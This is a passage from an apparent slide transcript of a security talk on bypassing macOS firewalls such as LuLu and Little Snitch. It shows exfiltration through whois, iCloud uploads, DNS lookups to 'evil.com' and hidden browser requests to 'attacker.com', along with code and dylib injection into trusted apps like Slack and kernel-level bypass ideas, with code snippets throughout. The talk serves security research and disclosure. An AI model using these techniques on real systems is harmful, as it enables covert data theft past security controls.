 due to preferences, allowing apple process: /usr/bin/whois LuLu(105): adding rule for /usr/bin/whois
 ({ signedByApple = 1; signingIdentifier = "com.apple.whois"; }): action: ALLOW exfil via 'whois' via @info_dox LuLu (debug) log ...traffic (silently) allowed
  • 26. Bypassing LittleSnitch ...don't trust a domain! $ curl https://setup.icloud.com/setup/ws/1/login {"success":false,"error":"Invalid ... header"} curl little snitch (kext) *.icloud.com
  • 27. Bypassing LittleSnitch ...don't trust a domain! $ python iCloud.py upload ~/Desktop/topSecret.txt [1] login: https://setup.icloud.com/setup/ws/1/login params: {'clientBuildNumber': '15A99', 'clientId': '12A9D426-C45B-11E4-BA3B-B8E8563151B4'}
 
 [2] init'ing upload: https://p34-docws.icloud.com/ws/com.apple.CloudDocs/upload/web params: {'token': 'AQAAAABU-jxwYG7i1C7BBsuqtqfsa74Rb_2u6yI~"'} data: {"size": 6, "type": "FILE", "content_type": "text/plain", "filename": "topSecret.txt"}
 
 response: [{u'url': u'https://p34-contentws.icloud.com:443/8205919168/singleFileUpload? tk=BRC9cJWSP7a4AxOYKf8K&ref=01003e53bebaf26c7c47a33486f7776a26f60568a6&c=com.apple.clouddocs &z=com.apple.CloudDocs&uuid=3f678124-94d4-4fa0-9f1f-6d24dbc49f17&e=AvKdu5MfcUeIfLPJ6MeWTV6dS EBoN3BPTCwGHjqSF8jVCEfsXhKglXKR58YkzILGWw', u'owner': u'8205919168', u'document_id': u'BF38917E-DD30-44A9-8E34-32ABB7800899', u'owner_id': u'_ee6a3e4219e1fb22e1d9d0690b7366b6'}]
 
 [3] uploading to: https://p34-contentws.icloud.com:443/8205919168/singleFileUpload? tk=BRC9cJWSP7a4AxOYKf8K&ref=01003e53bebaf26c7c47a33486f7776a26f60568a6&c=com.apple.clouddocs &z=com.apple.CloudDocs&uuid=3f678124-94d4-4fa0-9f1f-6d24dbc49f17&e=AvKdu5MfcUeIfLPJ6MeWTV6dS EBoN3BPTCwGHjqSF8jVCEfsXhKglXKR58YkzILGWw response: {u'singleFile': {u'referenceChecksum': u'AQA+U7668mx8R6M0hvd3aib2BWim', u'wrappingKey': u'3gtDUoGIjmFloUFCTFvLCQ==', u'receipt': u'A0/B7PXdJi5JC5Ep', u'size': 6, u'fileChecksum': u'Abv+EeVEGAQ0o5/2szwFFOVX1ICw'}} [4] committing upload: https://p34-docws.icloud.com/ws/com.apple.CloudDocs/update/documents exfil to iCloud C&C
  • 28. Generic Bypasses regardless of firewall product: connect out goal: access the network (e.g. connect to a malicious C&C server or exfiltrate data) without being blocked by (any) firewall. firewalls are inherently disadvantaged ...must allow certain network traffic! system functionality (dns, os updates, etc.) 'usability' (browsers, chat clients, etc.) } passively determine what's allowed abuse these trusted protocols/processes to generically bypass any installed firewall
  • 29. Generic Bypasses what traffic is allowed? $ lsof -i TCP -sTCP:ESTABLISHED Google Chrome patricks-mbp.lan:58107->ec2-107-21-125-119.compute-1.amazonaws.com:https Signal patricks-mbp.lan:58098->ec2-52-2-222-12.compute-1.amazonaws.com:https Slack patricks-mbp.lan:58071->151.101.196.102:https VMware patricks-mbp.lan:62676->a23-55-114-98.deploy.static.akamaitechnologies.com:https com.apple.WebKit.Networking (Safari) patricks-mbp.lan:58189->a23-55-116-179.deploy.static.akamaitechnologies.com:https Core Sync.app patricks-mbp.lan:58195->ec2-52-5-250-175.compute-1.amazonaws.com:https Creative Cloud.app patricks-mbp.lan:57194->ec2-52-2-42-38.compute-1.amazonaws.com:https GitHub patricks-mbp.lan:58119->lb-192-30-255-116-sea.github.com:https } lsof output (user processes) what's allowed!?
  • 30. Abusing DNS connect to 'evil.com' XPC resolve 'evil.com' mdnsresponder allowed dns server firewall examines request dns server resolves request macOS 
 domain name resolution handled by mdnsresponder fully trusted by firewalls
  • 31. Abusing DNS int main(int argc, const char * argv[]) { 
 struct addrinfo *result = {0}; //'resolve' DNS // this is routed to mDNSResponder getaddrinfo(argv[1], NULL, NULL, &result); .... resolve 'data.to.exfilatrate.evil.com' responseencode tasking in A* records HandsOff (in advanced mode) tracks DNS resolutions, but NOT "DNS Service Discovery" (DNS-SD, see: /usr/include/dns_sd.h)
  • 32. Abusing Browsers synthetic browsing via AppleScript "A browser that is not afforded indiscriminate network access (at least to remote web severs) is rather useless" tell application "Safari" run tell application "Finder" to set visible of process "Safari" to false make new document
 set the URL of document 1 to "http://attacker.com?data=data%20to%20exfil"
 end tell invisible exfil data
  • 33. Abusing Browsers synthetic browsing via cmdline interfaces $ "Google Chrome" 
 --crash-dumps-dir=/tmp
 --headless http://attacker.com?data=data%20to%20exfil $ firefox-bin 
 --headless http://attacker.com?data=data%20to%20exfil $ open -j -a Safari 
 http://attacker.com?data=data%20to%20exfil //what's user's default browser? CFURLRef http = CFURLCreateWithString(NULL, CFSTR("http://"), NULL); CFURLRef browser = LSCopyDefaultApplicationURLForURL(http, kLSRolesAll, nil); determine default browser
  • 34. Abusing Code/Dylib Injections any code in a trusted process, is trusted any code running in the context of process trusted ('allowed') by a firewall, will inherit that same trust! injection methods of injection: write to remote memory malicious plugins dylib proxying environment variables targets: 3rd-party apps
  • 35. Abusing Code/Dylib Injections writing to remote memory //get task ports via 'processor_set_tasks' processor_set_default(myhost, &psDefault); host_processor_set_priv(myhost, psDefault, &psDefault_control); processor_set_tasks(psDefault_control, &tasks, &numTasks); //find process's task port // then (as a poc) remotely allocate some memory for(i = 0; i < numTasks; i++) { pid_for_task(tasks[i], &pid); if (pid == targetPID) { mach_vm_address_t remoteMem = NULL; mach_vm_allocate(tasks[i], &remoteMem, 
 1024, VM_FLAGS_ANYWHERE); //now write & exec injected shellcode "Who needs task_for_pid() anyway..." -(j. levin) # ps aux | grep Slack patrick 36308 /Applications/Slack.app
 # lsof -p 36308 | grep TCP Slack TCP patricks-mbp.lan:57408 -> ec2-52-89-46.us-west-2.compute.amazonaws.com # ./getTaskPort -p 36308 getting task port for Slack (pid: 36308) got task: 0xa703 allocated remote memory @0x109b4e000 ... 'traditional' injection
  • 36. Abusing Code/Dylib Injections environment variable (DYLD_INSERT_LIBRARIES) $ DYLD_INSERT_LIBRARIES=/tmp/bypass.dylib /Applications/Slack.app/Contents/MacOS/Slack //custom constructor __attribute__((constructor)) static void initializer(void) { NSURL *url = [NSURL URLWithString: @"http://www.attacker.com/?data=data%20to%20exfil%20via%20Slack"]; NSData *data = [NSData dataWithContentsOfURL:url]; } malicious dylib target (trusted) application dylib w/ custom constructor user agent: 'Slack'
  • 37. Abusing Code/Dylib Injections dylib proxying LC_LOAD_DYLIB: /Applications/<some app>/<some>.dylib note, due to System Integrity Protection (SIP) one cannot replace/proxy system dynamic libraries. LC_LOAD_DYLIB: /Applications/<some app>/<some>.dylib
  • 38. Abusing Code/Dylib Injections dylib proxying in two easy steps copy original dylib replace original dylib -Xlinker -reexport_library <path to legit dylib> re-export symbols! $ install_name_tool -change <existing value of LC_REEXPORT_DYLIB> <new value for to LC_REEXPORT_DYLIB (e.g target dylib)> <path to dylib to update>
  • 39. Kernel-based Bypasses in ring-0, no one can stop you! static kern_return_t attach( ... ) { ... //don't mess w/ kernel sockets if(0 == proc_selfpid()) { //allow result = kIOReturnSuccess; goto bail; } traffic from the kernel is generally (allowed) trusted allowing kernel traffic (LuLu)
  • 40. Kernel-based Bypasses in ring-0, no one can stop you! kernel mode "Different possibilities exist to hide our network connections from Little Snitch and also Apple's application firewall. The easiest one is to patch or hook the sf_attach callback." -fG! (@osxreverser) patch callbacks remove callbacks
  • 41. Kernel-based Bypasses ok, how do we get into the kernel? get root 'bring' & load buggy kext exploit to run unsigned kernel code(buggy) kext still validly signed! code loaded into the kernel (i.e. kexts) must be signed...and Apple rarely hands out kext signing certs! SlingShot APT (Windows)
  • 42. Kernel-based Bypasses ok, how do we get into the kernel? "macOS High Sierra 10.13 introduces a new feature that requires user approval before loading new third-party kernel extensions." -apple " " fixed? bypass with synthetic event [0day] "The Mouse is Mightier than the Sword" (DefCon, Sunday 10AM) Apple: yes, 100% fixed Patrick: nope, it's not!!
  • 44. macOS Firewalls kernel socket filter } bugs bypasses firewalls are not enough! use other host-based security products use network-based security products making: breaking:
  • 45. ...ok, one more last thing! "Objective by the Sea" conference ObjectiveByTheSea.com Maui, Hawaii Nov 3rd/4th All things macOS malware bugs security Free for Objective-See patrons!
  • 47. Credits - iconexperience.com - wirdou.com/2012/02/04/is-that-bad-doctor - http://pre04.deviantart.net/2aa3/th/pre/f/ 2010/206/4/4/441488bcc359b59be409ca02f863e843.jpg
 
 - opensource.apple.com - newosxbook.com (*OS Internals) - github.com/objective-see/LuLu - apress.com/gp/book/9781430235361 - phrack.org/issues/69/7.html
 images resources